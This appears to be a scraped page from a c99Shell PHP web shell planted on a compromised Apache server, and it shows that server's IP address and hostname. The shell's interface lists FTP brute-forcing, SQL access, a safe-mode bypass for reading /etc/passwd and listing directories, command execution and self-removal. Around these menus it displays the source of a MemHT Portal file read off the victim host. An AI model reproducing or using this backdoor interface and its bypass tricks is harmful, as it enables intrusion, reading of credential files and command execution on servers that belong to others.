110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/alumni/pages/download/ drwxr-xr-x Free 40.49 GB of 127.8 GB (31.68%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php



/********************************************************************************

    - MemHT Portal -

    

    Copyright (C) 2007-2008 by Miltenovik Manojlo

    http://www.memht.com

    

    This program is free software; you can redistribute it and/or modify

    it under the terms of the GNU General Public License as published by

    the Free Software Foundation; either version 2 of the License, or

    (at your opinion) any later version.

    

    This program is distributed in the hope that it will be useful,

    but WITHOUT ANY WARRANTY; without even the implied warranty of

    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

    GNU General Public License for more details.

    

    You should have received a copy of the GNU General Public License along

    with this program; if not, see <http://www.gnu.org/licenses/> (GPLv2)

    or write to the Free Software Foundation, Inc., 51 Franklin Street,

    Fifth Floor, Boston, MA02110-1301, USA.

        

********************************************************************************/



if (stristr(htmlentities($_SERVER['PHP_SELF']), "path.php")) {

    header("Location: ../../index.php");

    die();

}



global $pathtext;



$checkid = @intval($_GET['id']);

$checkop = @inCode($_GET['op']);

$catid = $checkid;    



switch ($checkop) {

    case "getFile":

        $row = $dblink->get_row("SELECT id,nome,cat FROM memht_download WHERE id=$checkid");

        $id = intval($row['id']);

        $title = outCode($row['nome']);

        $filetitle = " > <a href='index.php?page=download&op=getFile&id=$id&title=".mem_urlencode($title)."' title=\"$title\">$title</a>";

        $catid = intval($row['cat']);

    case "category":

        $row = $dblink->get_row("SELECT nome,parent FROM memht_download_categorie WHERE id=$catid");

        $cattitle = outCode($row['nome']);

        $parent = intval($row['parent']);

        if ($parent==0) {

            $pathtext .= " > <a href='index.php?page=download&op=category&id=$checkid&title=".mem_urlencode($cattitle)."' title=\"$cattitle\">$cattitle</a>";

        } else {

            $parent = $catid;

            $arrttl = array();

            $arrids = array();

            $terminate = false;

            $a = 20;

            while (!$terminate AND $a>=0) {

                $row = $dblink->get_row("SELECT id,nome,parent FROM memht_download_categorie WHERE id=$parent");

                $sid = intval($row['id']);

                $stitle = outCode($row['nome']);

                $parent = intval($row['parent']);

                

                $arrttl[] = $stitle;

                $arrids[] = $sid;

                

                if ($parent==0) { $terminate = true; }

                $a--;

            }

            $arrttl = array_reverse($arrttl);

            $arrids = array_reverse($arrids);

            for ($i=0;$i<sizeof($arrttl);$i++) {

                $pathtext .= " > <a href='index.php?page=download&op=category&id=".$arrids[$i]."&title=".mem_urlencode($arrttl[$i])."' title=\"".$arrttl[$i]."\">".$arrttl[$i]."</a>";

            }

        }

        if (!empty($filetitle)) { $pathtext .= "$filetitle"; }

    break;

}



?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: